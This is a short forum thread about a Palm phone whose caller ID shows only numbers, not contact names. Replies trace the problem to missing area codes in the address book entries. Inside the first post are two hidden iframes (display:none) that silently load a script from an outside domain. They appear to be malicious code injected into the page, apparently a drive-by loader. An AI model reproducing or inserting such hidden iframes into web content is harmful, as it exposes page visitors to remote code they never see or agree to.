+ Reply to Thread

Question Caller Id Question

I have a question on the caller id. It was my understanding that whenever a call comes in on the phone, it would match up a name in your address book and id the name instead of just the number. Is there something I should be doing to activate this feature? All the calls I have only shows the phone number and not the name. My address book was automatically downloaded from my old Palm when I first synched the phone last week. Any comments or advice?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The only time my palm show just a number is when the phone number is not in the address book or when I have two contacts with the same phone number. It seems to get confused about which one to display.

Otherwise, there is nothing special to do.

I assume you have examined your address book to make sure the numbers were synced to their appropriate fields. Have you tried manually entering a name and address, say your home, and calling?

I have tried to enter new address with phone number and called from that number. Still no luck. Just getting phone numbers on my caller i.d.

are you putting in area codes with your phone numbers? caller ID will identify all 10 digits.... might not match up to your address book entires if they only have 7 digits...

Brooks

good point Brooks

Thanks for the advice. It worked. I spent a couple of hours adding the area code to all my address entries.

I hope you did it using the Palm Desktop and not on the phone.